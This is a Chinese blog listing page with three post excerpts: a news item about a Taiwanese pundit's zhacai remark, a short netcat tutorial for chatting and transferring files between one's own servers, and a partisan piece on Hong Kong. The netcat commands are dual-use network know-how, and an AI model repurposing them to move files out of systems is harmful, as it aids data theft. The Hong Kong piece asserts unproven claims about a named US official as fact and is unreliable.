    此 前,台湾“名嘴”黄世聪在节目中声称“大陆人吃不起榨菜”,引发网友群嘲。 近日,乌江涪陵榨菜公司安排寄送一箱榨菜给黄世聪,并告诉他“我们吃得起”! 黄世聪:大陆人连榨菜都吃不起了 日前,在一档名为《关键时刻》节目中,台湾财经“砖家”黄世聪一本正经地称:“由于经济不景气,大陆人连榨菜都吃不起了。” 他还在节目中错把“涪陵”的“涪(fú)”读成了“péi”。 黄世聪在谈话节目《关键时刻》中大谈“榨菜论”。 这番言论在网上引起热议后,黄世聪在社交平台上回应时笑称:“请叫我:榨菜哥或榨菜聪。”他表示欢迎网友寄榨菜给他,并附上了地址。 8月11日,黄世聪上台湾另一档政论节目时,有嘉宾再曝出惊人言论“大陆经济不景气,导致五粮液价格大涨”“酒类产品跟景气是颠倒的。越不景气,酒卖得越好,因为你心情不好,要喝一点酒开心一下”。此番言论一出,迅速登上微博热搜,成为网友茶余饭后的笑料。 涪陵榨菜回应:榨菜已经安排上了! 针对“大陆人吃不起榨菜”的言论,乌江涪陵榨菜在其官方微博贴出一张寄往台北的包裹照片,感谢黄世聪“推荐了中国已有1000年历史的榨菜”“激发中国网友炫fu的聪明才智和热情”,因此安排寄送一箱榨菜至台北,告诉他,“我们吃得起榨菜”。 乌江涪陵榨菜微博截图。 对此,网友调侃:“我怀疑他在空手套榨菜” ...

    2019-08-17 876
  • 利用NC进行传输文件和吹牛逼

    环境说明 centos (公网服务器) kali linux (内网设备) 配置防火墙开启我们的端口,本次我们开启了5555端口 安装 centos系列 yum install nc -y Shell  复制 debian unbunt系列 apt-get install nc Shell  复制 进行交互式聊天 先开启服务器端 nc -l 5555 Shell  复制 然后我们开启客户端 nc 公网ip 5555 Shell  复制 传输文件 服务器端(接收端) nc -l 5555 > recv.txt Shell  复制 发送端 nc 192.168.XXX.XXX 5555 < send.txt Shell  复制 ...

    2019-08-15 1033
  • 乱港幕后黑手现形,外交部驻港公署紧急交涉

    针对媒体报道美国驻港总领馆官员接触香港“港独”组织头目事,外交部驻港公署有关负责人8月8日紧急约见美驻港总领馆高级官员,提出严正交涉,表达强烈不满和坚决反对,要求美方就此作出澄清。△ 图片来源 | 香港《大公报》 公署有关负责人强调,中方维护国家主权安全和香港繁荣稳定的意志坚定不移,坚决反对任何国家、组织和个人以任何方式干预香港事务。我们强烈敦促美驻港总领馆人员恪守《维也纳外交关系公约》、《维也纳领事关系公约》等国际法和国际关系基本准则,恪守领事人员身份与职责,立即与各种反中乱港分子划清界限,立即停止向违法暴力分子发出错误信号,立即停止插手香港事务,不要在错误的道路上越走越远。 热评丨谁在充当乱港的幕后黑手?他们终于耐不住寂寞现身了! 谁在充当乱港幕后黑手?来,看看香港局势演变的幕后推手,他们越来越耐不住寂寞,开始公开下“指导棋”。  “港独”组织头目黄之锋、罗冠聪,连同“独青”黄程锋、彭家浩在某酒店会面美国驻港澳总领事馆政治部主管Julie Eadeh,被市民撞见,照片很快在互联网刷屏。随后港媒曝出,Julie Eadeh所谓外交生涯起步于美国国务院的对外心战部门,注重渗透当地社会,派驻中东时曾以人权及民主为由,策划颠覆活动。“港独”分子,向颠覆专家请示什么?颠覆专家又会做出什么指令?我们不难想象。我们也正告他们,香港是中国的香港,香港的稳定是人心所向。中国人民不信邪也不怕邪,不惹事也不怕事。谁来充当幕后黑手,都会铩羽而归,不信走着瞧!...

    2019-08-09 883

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注